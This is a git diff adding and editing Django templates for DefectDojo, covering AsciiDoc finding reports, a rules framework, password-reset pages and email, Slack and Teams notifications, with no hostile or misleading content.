    + {{ find.description|linebreaksbr }} +

    +
    +

    ==== Impact: ==== +
    + {{ find.impact|linebreaksasciidocbr }} +

    +
    + + {% with endpoints=find|get_vulnerable_endpoints %} + {% if endpoints %} +

    ==== Vulnerable Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} + + {% with endpoints=find|get_mitigated_endpoints %} + {% if endpoints %} +

    ==== Remediated Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} + +

    ==== Suggested Mitigation: ==== +
    + {{ find.mitigation|linebreaksasciidocbr }} +

    +
    +

    ==== Further References: ==== +
    + {{ find.references|linebreaksasciidocbr }} +

    +
    + {% if include_finding_images %} +

    ==== Finding Images: ==== +
    + {% include "dojo/snippets/file_images.html" with size='small' obj=find format="AsciiDoc" %} +


    + {% else %} +
    + {% endif %} + + {% if include_finding_notes %} + {% with notes=find.notes.all|get_public_notes %} + {% if notes.count > 0 %} +

    ==== Finding Notes: ==== +
    + {% if notes|get_notetype_notes_count > 0 %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {% if note.note_type != None %}{{ note.note_type }}{% endif %} - {{ note }} +
    + {% endfor %} + {% else %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {{ note }} +
    + {% endfor %} + {% endif %} +


    + {% endif %} + {% endwith %} + {% endif %} + + {% endfor %} + + {% if mitigated_findings %} +

    == Mitigated Findings ==

    +
    + {% for find in mitigated_findings %} +

    === Finding {{ find.id }}: {{ find.title | nice_title }} {% if find.mitigated %} + Mitigated on: {{ find.mitigated }} {% endif %}===

    +
    +

    ==== Severity: ====
    + +{{ find.severity }} ({{ find.numerical_severity }}) + +


    +

    ==== Description / Exploit: ==== +
    + {{ find.description|linebreaksasciidocbr }} +

    + {% if include_finding_images %} +

    ==== Finding Images: ==== +
    + {% include "dojo/snippets/file_images.html" with size='small' obj=find format="AsciiDoc" %} +


    + {% else %} +
    + {% endif %} + + {% if include_finding_notes %} + {% with notes=find.notes.all|get_public_notes %} + {% if notes.count > 0 %} +
    +

    ==== Finding Notes: ==== +
    + {% if notes|get_notetype_notes_count > 0 %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {% if note.note_type != None %}{{ note.note_type }}{% endif %} - {{ note }} +
    + {% endfor %} + {% else %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {{ note }} +
    + {% endfor %} + {% endif %} +


    + {% endif %} + {% endwith %} + {% endif %} + {% endfor %} + {% endif %} + {% if endpoints %} +

    == Endpoints ==

    + {% for endpoint in endpoints %} +

    === {{ endpoint }} ===

    + {% for find in endpoint.active_findings %} +
    ==== Finding {{ find.id }}: {{ find.title | nice_title }} {% if find.mitigated %} + Mitigated on: {{ find.mitigated }} {% endif %}====
    +
    +

    ==== Product: ==== +
    + {{ find.test.engagement.product.name }} +

    +
    +

    ==== Status: ==== +
    + {{ find.status }} +

    +
    +

    ==== Severity: ==== +
    + +{{ find.severity }} ({{ find.numerical_severity }}) + +

    +

    ==== Description / Exploit: ==== +
    + {{ find.description|linebreaksbr }} +

    +
    +

    ==== Impact: ==== +
    + {{ find.impact|linebreaksasciidocbr }} +

    +
    + {% with endpoints=find|get_vulnerable_endpoints %} + {% if endpoints %} +

    ==== Vulnerable Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} + + {% with endpoints=find|get_mitigated_endpoints %} + {% if endpoints %} +

    ==== Remediated Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} +
    +

    ==== Suggested Mitigation: ==== +
    + {{ find.mitigation|linebreaksasciidocbr }} +

    +
    +

    ==== Further References: ==== +
    + {{ find.references|linebreaksasciidocbr }} +

    +
    + {% if include_finding_images %} +

    ==== Finding Images: ==== +
    + {% include "dojo/snippets/file_images.html" with size='small' obj=find format="AsciiDoc" %} +


    + {% else %} +
    + {% endif %} +
    + + {% if include_finding_notes %} + {% with notes=find.notes.all|get_public_notes %} + {% if notes.count > 0 %} +
    +

    ==== Finding Notes: ==== +
    + {% if notes|get_notetype_notes_count > 0 %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {% if note.note_type != None %}{{ note.note_type }}{% endif %} - {{ note }} +
    + {% endfor %} + {% else %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {{ note|linebreaks }} +
    + {% endfor %} + {% endif %} +


    + {% endif %} + {% endwith %} + {% endif %} + {% endfor %} + {% endfor %} + {% endif %} + {% if include_table_of_contents %} +
    + {% endif %} +{% endblock %} +{% block postscript %} + {{ block.super }} + +{% endblock %} diff --git a/dojo/templates/dojo/custom_asciidoc_report.html b/dojo/templates/dojo/custom_asciidoc_report.html new file mode 100644 index 00000000000..d08976d57b2 --- /dev/null +++ b/dojo/templates/dojo/custom_asciidoc_report.html @@ -0,0 +1,15 @@ +{% extends "base.html" %} +{% load static %} +{% load event_tags %} +{% load display_tags %} +{% load humanize %} + +{% block content %} + {{ block.super }} + + {% for widget in widgets %} + {{ widget.get_asciidoc }} + {% endfor %} +{% endblock %} diff --git a/dojo/templates/dojo/custom_asciidoc_report_endpoints.html b/dojo/templates/dojo/custom_asciidoc_report_endpoints.html new file mode 100644 index 00000000000..6fba89de8a4 --- /dev/null +++ b/dojo/templates/dojo/custom_asciidoc_report_endpoints.html @@ -0,0 +1,121 @@ +{% load display_tags %} +{% load humanize %} +{% load get_endpoint_status %} +{% load get_note_status %} +{% load get_notetype_availability %} +{% load event_tags %} +{% if endpoints %} +

    == Endpoints ==

    + {% for endpoint in endpoints %} +

    === {{ endpoint }} with {{ endpoint.active_findings|length|apnumber }} active findings ===

    + {% for find in endpoint.active_findings %} +
    ==== Finding {{ find.id }}: {{ find.title | nice_title }} {% if find.mitigated %} + Mitigated on: {{ find.mitigated }} {% endif %} + {% if find.tags %} + + [ + {% for tag in find.tags.all %} + {{ tag }} + {% endfor %} + ] + + {% endif %} ==== +
    +
    +

    ==== Product: ==== +
    + {{ find.test.engagement.product.name }} +

    +
    +

    ==== Status: ==== +
    + {{ find.status }} +

    +

    ==== CVSSv3: ==== +
    + {{ find.cvssv3|linebreaksbr }} +

    +
    +

    ==== Severity: ==== +
    + +{{ find.severity }} ({{ find.numerical_severity }}) + +

    +

    ==== Description / Exploit: ==== +
    + {{ find.description|linebreaksbr }} +

    +
    +

    ==== Impact: ==== +
    + {{ find.impact|linebreaksasciidocbr }} +

    +
    + {% with endpoints=find|get_vulnerable_endpoints %} + {% if endpoints %} +

    ==== Vulnerable Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} + + {% with endpoints=find|get_mitigated_endpoints %} + {% if endpoints %} +

    ==== Remediated Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} +
    +

    ==== Suggested Mitigation: ==== +
    + {{ find.mitigation|linebreaksasciidocbr }} +

    +
    +

    ==== Further References: ==== +
    + {{ find.references|linebreaksasciidocbr }} +

    +
    + {% if include_finding_images %} +

    ==== Finding Images: ==== +
    + {% include "dojo/snippets/file_images.html" with size='small' obj=find format="AsciiDoc" %} +


    + {% else %} +
    + {% endif %} +
    + {% if include_finding_notes %} + {% with notes=find.notes.all|get_public_notes %} + {% if notes.count > 0 %} +

    ==== Finding Notes: ==== +
    + {% if notes|get_notetype_notes_count > 0 %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {% if note.note_type != None %}{{ note.note_type }}{% endif %} - {{ note }} +
    + {% endfor %} + {% else %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {{ note }} +
    + {% endfor %} + {% endif %} +


    + {% endif %} + {% endwith %} + {% endif %} + {% endfor %} + {% endfor %} +{% endif %} diff --git a/dojo/templates/dojo/custom_asciidoc_report_findings.html b/dojo/templates/dojo/custom_asciidoc_report_findings.html new file mode 100644 index 00000000000..8f23f3cb005 --- /dev/null +++ b/dojo/templates/dojo/custom_asciidoc_report_findings.html @@ -0,0 +1,124 @@ +{% load display_tags %} +{% load humanize %} +{% load event_tags %} +{% load get_endpoint_status %} +{% load get_note_status %} +{% load get_notetype_availability %} +{% if findings %} +

    == Findings ==

    +
    +{% endif %} +{% for find in findings %} +

    ==== {{ find.title | nice_title }} {% if find.mitigated %} + Mitigated on: {{ find.mitigated }} {% endif %} + {% if find.tags %} + + [ + {% for tag in find.tags.all %} + {{ tag }} + {% endfor %} + ] + + {% endif %} ==== +

    +
    +

    ==== Product: ==== +
    + {{ find.test.engagement.product.name }} +

    +
    +

    ==== Status: ==== +
    + {{ find.status }} +

    +
    +

    ==== CVSS v3: ==== +
    + {{ find.cvssv3|linebreaksasciidocbr }} +

    +
    +

    ==== Severity: ==== +
    + +{{ find.severity }} ({{ find.numerical_severity }}) + +

    +

    ==== Description / Exploit: ==== +
    + {{ find.description|linebreaksbr }} +

    +
    +

    ==== Impact: ==== +
    + {{ find.impact|linebreaksasciidocbr }} +

    +
    + {% with endpoints=find|get_vulnerable_endpoints %} + {% if endpoints %} +

    ==== Vulnerable Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} + + {% with endpoints=find|get_mitigated_endpoints %} + {% if endpoints %} +

    ==== Remediated Endpoints: ====
    + {% for endpoint in endpoints %} + {{ endpoint }} +
    + {% endfor %} +

    +
    + {% endif %} + {% endwith %} + +

    ==== Suggested Mitigation: ==== +
    + {{ find.mitigation|linebreaksasciidocbr }} +

    +
    +

    ==== Further References: ==== +
    + {{ find.references|linebreaksasciidocbr }} +

    +

    ==== Finding ID: ==== +
    + Finding {{ find.id }} +

    +
    + {% if include_finding_images %} +

    ==== Finding Images: ==== +
    + {% include "dojo/snippets/file_images.html" with size='small' obj=find format="AsciiDoc" %} +


    + {% else %} +
    + {% endif %} +
    + {% if include_finding_notes %} + {% with notes=find.notes.all|get_public_notes %} + {% if notes.count > 0 %} +

    ==== Finding Notes: ==== +
    + {% if notes|get_notetype_notes_count > 0 %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {% if note.note_type != None %}{{ note.note_type }}{% endif %} - {{ note }} +
    + {% endfor %} + {% else %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {{ note }} +
    + {% endfor %} + {% endif %} +


    + {% endif %} + {% endwith %} + {% endif %} +{% endfor %} diff --git a/dojo/templates/dojo/custom_asciidoc_report_wysiwyg_content.html b/dojo/templates/dojo/custom_asciidoc_report_wysiwyg_content.html new file mode 100644 index 00000000000..0874c909e28 --- /dev/null +++ b/dojo/templates/dojo/custom_asciidoc_report_wysiwyg_content.html @@ -0,0 +1,3 @@ +{% load static %} +
    +{{ content|safe }} diff --git a/dojo/templates/dojo/delete_rule.html b/dojo/templates/dojo/delete_rule.html new file mode 100644 index 00000000000..949294185cc --- /dev/null +++ b/dojo/templates/dojo/delete_rule.html @@ -0,0 +1,29 @@ +{% extends "base.html" %} +{% block content %} + {{ block.super }} +

    Delete Rule {{ rule }}

    +

    + Deleting this rule will remove any related objects associated + with it. These relationships are listed below: +

    +
    +
    +

    Danger Zone

    +
    + {% if rels|length > 1 %} +
      {{ rels|unordered_list }}
    + {% else %} +

    No relationships found.

    + {% endif %} + + {% csrf_token %} + {{ form }} + +
    + +
    + +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/edit_rule.html b/dojo/templates/dojo/edit_rule.html new file mode 100644 index 00000000000..99a05f4335b --- /dev/null +++ b/dojo/templates/dojo/edit_rule.html @@ -0,0 +1,86 @@ +{% extends "base.html" %} +{% block content %} + {{ block.super }} +

    Edit Rule {{ pt.name }}

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + + +
    +
    +
    +{% endblock %} +{% block postscript %} + {{ block.super }} + + + + +{% endblock %} diff --git a/dojo/templates/dojo/express_new_jira.html b/dojo/templates/dojo/express_new_jira.html new file mode 100644 index 00000000000..4394c5d6bbc --- /dev/null +++ b/dojo/templates/dojo/express_new_jira.html @@ -0,0 +1,16 @@ +{% extends "base.html"%} +{% block content %} + {{ block.super }} +

    Add a JIRA Configuration Express

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=jform %} +
    +
    + +
    +

    + Finding severity mappings and other options can be edited after express configuration is complete. +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/field-datetime.html b/dojo/templates/dojo/field-datetime.html new file mode 100644 index 00000000000..f74e9fa07e6 --- /dev/null +++ b/dojo/templates/dojo/field-datetime.html @@ -0,0 +1,6 @@ +{% spaceless %} + {% for widget in widget.subwidgets %} + {% include widget.template_name %} + {% endfor %} + Leave empty to set current time. +{% endspaceless %} diff --git a/dojo/templates/dojo/finding_pdf_report.html b/dojo/templates/dojo/finding_pdf_report.html index 79235b1e07f..0f0ba59c27a 100644 --- a/dojo/templates/dojo/finding_pdf_report.html +++ b/dojo/templates/dojo/finding_pdf_report.html @@ -160,6 +160,8 @@
    CVSS v3
    {{ finding.cvssv3|markdown_render }}
    {% endif %} +
    CVSS v3
    +
    {{ finding.cvssv3 }}
    Description
    {{ finding.description|markdown_render }}
    diff --git a/dojo/templates/dojo/google_sheet_configuration.html b/dojo/templates/dojo/google_sheet_configuration.html new file mode 100644 index 00000000000..25379c3f411 --- /dev/null +++ b/dojo/templates/dojo/google_sheet_configuration.html @@ -0,0 +1,15 @@ +{% extends "base.html" %} +{% block content %} + {{ block.super }} +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + + {% if revoke_access %} + + {% endif %} +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/new_eng.html b/dojo/templates/dojo/new_eng.html index 16c0dc934c3..185fb036735 100644 --- a/dojo/templates/dojo/new_eng.html +++ b/dojo/templates/dojo/new_eng.html @@ -86,6 +86,38 @@

    JIRA Epic

    }); mde.render(); } + + var mde = new EasyMDE({ + spellChecker: false, + element: elem, + autofocus: false, + forceSync: true, + toolbar: ["bold", "italic", "heading", "|", + "quote", "unordered-list", "ordered-list", "|", + "link", "image", "|", + "table", "horizontal-rule", "code", "|", + "guide" + ] + }); + mde.render(); + }); + }); + + diff --git a/dojo/templates/dojo/new_product.html b/dojo/templates/dojo/new_product.html index 6eba8e661e8..77229a841b1 100644 --- a/dojo/templates/dojo/new_product.html +++ b/dojo/templates/dojo/new_product.html @@ -63,6 +63,20 @@

    Github

    }); mde.render(); } + + var mde = new EasyMDE({ + spellChecker: false, + element: elem, + autofocus: false, + forceSync: true, + toolbar: ["bold", "italic", "heading", "|", + "quote", "unordered-list", "ordered-list", "|", + "link", "image", "|", + "table", "horizontal-rule", "code", "|", + "guide" + ] + }); + mde.render(); }); }); diff --git a/dojo/templates/dojo/new_rule.html b/dojo/templates/dojo/new_rule.html new file mode 100644 index 00000000000..0d51f49cfa3 --- /dev/null +++ b/dojo/templates/dojo/new_rule.html @@ -0,0 +1,101 @@ +{% extends "base.html" %} +{% load get_attribute %} +{% block content %} + {{ block.super }} +

    Add Child Rules

    +
    {% csrf_token %} + {% for f in form %} +
    + {% if forloop.first %} +
    +

    Child Rule

    + {% include "dojo/form_fields.html" with form=f %} + {% else %} +
    +

    Child Rule

    + {% include "dojo/form_fields.html" with form=f %} + {% endif %} +
    + {% endfor %} +
    +
    +
    + {{ form.management_form }} + +
    +
    +
    +
    +{% endblock %} +{% block postscript %} + {{ block.super }} + + + + +{% endblock %} diff --git a/dojo/templates/dojo/new_rule2.html b/dojo/templates/dojo/new_rule2.html new file mode 100644 index 00000000000..07e98d7be83 --- /dev/null +++ b/dojo/templates/dojo/new_rule2.html @@ -0,0 +1,14 @@ +{% extends "base.html" %} +{% block content %} + {{ block.super }} +

    Add New Rule

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + + +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/password_reset.html b/dojo/templates/dojo/password_reset.html new file mode 100644 index 00000000000..f79b7d48b12 --- /dev/null +++ b/dojo/templates/dojo/password_reset.html @@ -0,0 +1,18 @@ +{% extends 'base.html' %} +{% load i18n static %} +{% block content %} + {{ block.super }} +

    {% translate 'Password reset' %}

    +

    {% translate 'Forgotten your password? Enter your email address below, and we’ll email instructions for setting a new one.' %}

    + +
    {% csrf_token %} +
    + {% include "dojo/form_fields.html" with form=form %} +
    +
    + +
    +
    +
    +
    +{% endblock %} \ No newline at end of file diff --git a/dojo/templates/dojo/password_reset_complete.html b/dojo/templates/dojo/password_reset_complete.html new file mode 100644 index 00000000000..fcea30e42e0 --- /dev/null +++ b/dojo/templates/dojo/password_reset_complete.html @@ -0,0 +1,14 @@ +{% extends 'base.html' %} +{% load i18n static %} +{% block content %} +{{ block.super }} +

    {% translate 'Password reset' %}

    +
    +

    {% translate "Your password has been set. You may go ahead and log in now." %}

    + +
    +{% endblock %} \ No newline at end of file diff --git a/dojo/templates/dojo/password_reset_confirm.html b/dojo/templates/dojo/password_reset_confirm.html new file mode 100644 index 00000000000..23c081f68d3 --- /dev/null +++ b/dojo/templates/dojo/password_reset_confirm.html @@ -0,0 +1,23 @@ +{% extends 'base.html' %} +{% load i18n static %} +{% block content %} +{{ block.super }} +

    {% translate 'Password reset confirmation' %}

    +{% if validlink %} +

    {% translate "Please enter your new password twice so we can verify you typed it in correctly." %}

    +
    {% csrf_token %} +
    + {% include "dojo/form_fields.html" with form=form %} +
    +
    + +
    +
    +
    +
    +{% else %} +
    +

    {% translate "The password reset link was invalid, possibly because it has already been used. Please request a new password reset." %}

    +
    +{% endif %} +{% endblock %} \ No newline at end of file diff --git a/dojo/templates/dojo/password_reset_done.html b/dojo/templates/dojo/password_reset_done.html new file mode 100644 index 00000000000..6fed1045645 --- /dev/null +++ b/dojo/templates/dojo/password_reset_done.html @@ -0,0 +1,10 @@ +{% extends 'base.html' %} +{% load i18n static %} +{% block content %} +{{ block.super }} +

    {% translate 'Password reset' %}

    +
    +

    {% translate 'We’ve emailed you instructions for setting your password, if an account exists with the email you entered. You should receive them shortly.' %}

    +

    {% translate 'If you don’t receive an email, please make sure you’ve entered the address you registered with, and check your spam folder.' %}

    +
    +{% endblock %} \ No newline at end of file diff --git a/dojo/templates/dojo/product.html b/dojo/templates/dojo/product.html index 2b2a3c6a8ff..bcb7cbb5386 100644 --- a/dojo/templates/dojo/product.html +++ b/dojo/templates/dojo/product.html @@ -252,6 +252,28 @@

    {{ prod.endpoint_host_count }} / {{ prod.endpoint_count }} + {% else %} + 0 + {% endif %} + + + {% if prod.product_manager %} + {% if prod.product_manager != "0" %} + {{ prod.product_manager }}, Manager + {% if prod.team_manager or prod.technical_contact %}
    {% endif %} + {% endif %} + {% endif %} + {% if prod.team_manager %} + {% if prod.team_manager != "0" %} + {{ prod.team_manager }}, Team Lead + {% if prod.product_manager or prod.technical_contact %}
    {% endif %} + {% endif %} + {% endif %} + {% if prod.technical_contact %} + {% if prod.technical_contact != "0" %} + {{ prod.technical_contact }}, Technical + {% endif %} + {% endif %} {% if prod.product_manager %} diff --git a/dojo/templates/dojo/rules.html b/dojo/templates/dojo/rules.html new file mode 100644 index 00000000000..ec539c7f2de --- /dev/null +++ b/dojo/templates/dojo/rules.html @@ -0,0 +1,96 @@ +{% extends "base.html" %} +{% load navigation_tags %} +{% load authorization_tags %} +{% block content %} + {{ block.super }} +
    +
    +
    + WARNING: The Rules Framework is an unsupported beta feature, only for power users. It is possible to ruin your data if you're not careful. +
    +
    +
    +

    + Rules Framework + +

    +
    +
    + {% include "dojo/filter_snippet.html" with form=rules.form %} +
    +
    + + {% if rules %} +
    + {% include "dojo/paging_snippet.html" with page=rules page_size=True %} +
    + +
    + + + + + + + + + + + {% for rule in rules %} + + + + + + + + + {% endfor %} + +
    {% dojo_sort request 'Rule' 'text' 'asc' %} Operation Match Applies
    {{ rule.text }} {{ rule.operator }} {{ rule.model_object }}:{{rule.match_field}} {{ rule.applies_to }}:{{rule.applied_field}} +
    +
    + {% if "dojo.change_rule"|has_configuration_permission:"superuser" %} + + Edit + + {% endif %} + {% if "dojo.delete_rule"|has_configuration_permission:"superuser" %} + + Delete + + {% endif %} +
    +
    +
    +
    +
    + {% include "dojo/paging_snippet.html" with page=rules page_size=True %} +
    + {% else %} +

    No rules found.

    + {% endif %} +
    +
    + {% include "dojo/filter_js_snippet.html" %} +{% endblock %} diff --git a/dojo/templates/dojo/syncing_errors.html b/dojo/templates/dojo/syncing_errors.html new file mode 100644 index 00000000000..99e56d68f2c --- /dev/null +++ b/dojo/templates/dojo/syncing_errors.html @@ -0,0 +1,48 @@ +{% extends "base.html" %} +{% load navigation_tags %} +{% block content %} + {{ block.super }} + {% load display_tags %} +

    + Synced with "{{ sheet_title }}" sheet of Spreadsheet "{{ spreadsheet_name }}" +

    +
    +
    +
    +
    +

    + {{ name }} +

    +
    +
    + {% if errors %} +
    + {% include "dojo/paging_snippet.html" with page=errors page_size=True %} +
    +
    + + + + + + + {% for e in errors %} + + + + + + {% endfor %} +
    Finding ID Column Names Error
    {{ e.finding_id }}{{ e.column_names }}{{ e.error }}
    +
    +
    + {% include "dojo/paging_snippet.html" with page=errors page_size=True %} +
    + {% else %} +
    No Errors
    + {% endif %} +
    +
    + View Google Sheet +{% endblock %} diff --git a/dojo/templates/dojo/view_eng.html b/dojo/templates/dojo/view_eng.html index ab09dadb7c5..a4779f75f18 100644 --- a/dojo/templates/dojo/view_eng.html +++ b/dojo/templates/dojo/view_eng.html @@ -1073,12 +1073,12 @@

    var terms = ''; if ($.cookie('highlight')) { terms = $.cookie('highlight').split(' '); - + for (var i = 0; i < terms.length; i++) { $('body').highlight(terms[i]); } } - + $('input#simple_search').val(terms); } @@ -1120,4 +1120,4 @@

    {% include 'dojo/snippets/risk_acceptance_actions_snippet_js.html' %} -{% endblock %} +{% endblock %} \ No newline at end of file diff --git a/dojo/templates/dojo/view_finding.html b/dojo/templates/dojo/view_finding.html index b03f632c6b5..e38ed164d52 100755 --- a/dojo/templates/dojo/view_finding.html +++ b/dojo/templates/dojo/view_finding.html @@ -43,6 +43,16 @@

    {% if latest_test_import_finding_action %} , Last Mentioned in (Re)Import: {{ latest_test_import_finding_action.created | naturalday }} as {{ latest_test_import_finding_action.get_action_display }} {% endif %} + {% if finding.last_status_update %} + Last Status Update {{ finding.last_status_update | naturalday }}, + {% endif %} + Created + {% if finding.last_reviewed > finding.created %} + {{ finding.created | naturalday }} + {% else %} + {{ finding.date | naturalday }} + {% endif %} +

    + + +{% include "dojo/snippets/comments.html" with notes=notes object=test destination="test" %} + +
    + ProTip! Type e to edit this test. Type a to add a finding to this test. +
    {% endblock %} {% block postscript %} diff --git a/dojo/templates/notifications/engagement_added.tpl b/dojo/templates/notifications/engagement_added.tpl new file mode 100644 index 00000000000..496338a33cd --- /dev/null +++ b/dojo/templates/notifications/engagement_added.tpl @@ -0,0 +1,92 @@ +{% if type == 'mail' %} + {% load navigation_tags %} + {% load display_tags %} + {% url 'view_product' engagement.product.id as product_url %} + {% url 'view_engagement' engagement.id as engagement_url %} + + + {% autoescape on %} +

    + Hello, +

    +

    + The engagement "{{ engagement.name }}" has been created in the product "{{ engagement.product }}". It can be viewed here: {{product}} / {{ engagement.name }} +

    +
    +
    + Kind regards,
    +
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + The engagement "{{ engagement.name }}" has been created in the product "{{ engagement.product }}". +{% elif type == 'slack' %} + The engagement "{{ engagement.name }}" has been created in the product "{{ engagement.product }}". It can be viewed here: {{ url|full_url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Engagement added", + "summary": "Engagement added", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "A new engagement has been added.", + "facts": [ + { + "name": "Product:", + "value": "{{ engagement.product.name }}" + }, + { + "name": "Engagement:", + "value": "{{ engagement.name }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View Engagement", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/other.tpl b/dojo/templates/notifications/other.tpl new file mode 100644 index 00000000000..91590f9b5cd --- /dev/null +++ b/dojo/templates/notifications/other.tpl @@ -0,0 +1,86 @@ +{% if type == 'mail' %} + {% load navigation_tags %} + {% load display_tags %} + + + {% autoescape on %} +

    + Hello, +

    +

    + {{ description|safe }} +

    + {% if url is not None %} +
    +
    + More information on this event can be found here: {{ url|full_url }} + {% endif %} +
    +
    + Kind regards,
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + {{ description|safe }} +{% elif type == 'slack' %} + {{ description|safe }} + {% if url is not None %} + More information on this event can be found here: {{ url|full_url }} + {% endif %} + {% if system_settings.disclaimer|length %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Event", + "summary": "Event", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "{% autoescape on %} {{ description }} {% endautoescape %}" + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/product_added.tpl b/dojo/templates/notifications/product_added.tpl new file mode 100644 index 00000000000..e1f4b2a3b07 --- /dev/null +++ b/dojo/templates/notifications/product_added.tpl @@ -0,0 +1,86 @@ +{% if type == 'mail' %} +{% load navigation_tags %} +{% load display_tags %} + + + {% autoescape on %} +

    + Hello, +

    +

    + The new product "{{ title }}" has been added. It can be viewed here: {{ title }} +

    +
    +
    + Kind regards,
    +
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +

    +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + The new product "{{ title }}" has been added +{% elif type == 'slack' %} + The new product "{{ title }}" has been added. It can be viewed here: {{ url|full_url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Product Added", + "summary": "Product Added", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "A new product has been added.", + "facts": [ + { + "name": "Product:", + "value": "{{ title }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View Product", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/product_type_added.tpl b/dojo/templates/notifications/product_type_added.tpl new file mode 100644 index 00000000000..6261d1655f3 --- /dev/null +++ b/dojo/templates/notifications/product_type_added.tpl @@ -0,0 +1,86 @@ +{% if type == 'mail' %} +{% load navigation_tags %} +{% load display_tags %} + + + {% autoescape on %} +

    + Hello, +

    +

    + The new product type "{{ title }}" has been added. It can be viewed here: {{ title }} +

    +
    +
    + Kind regards,
    +
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +

    +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
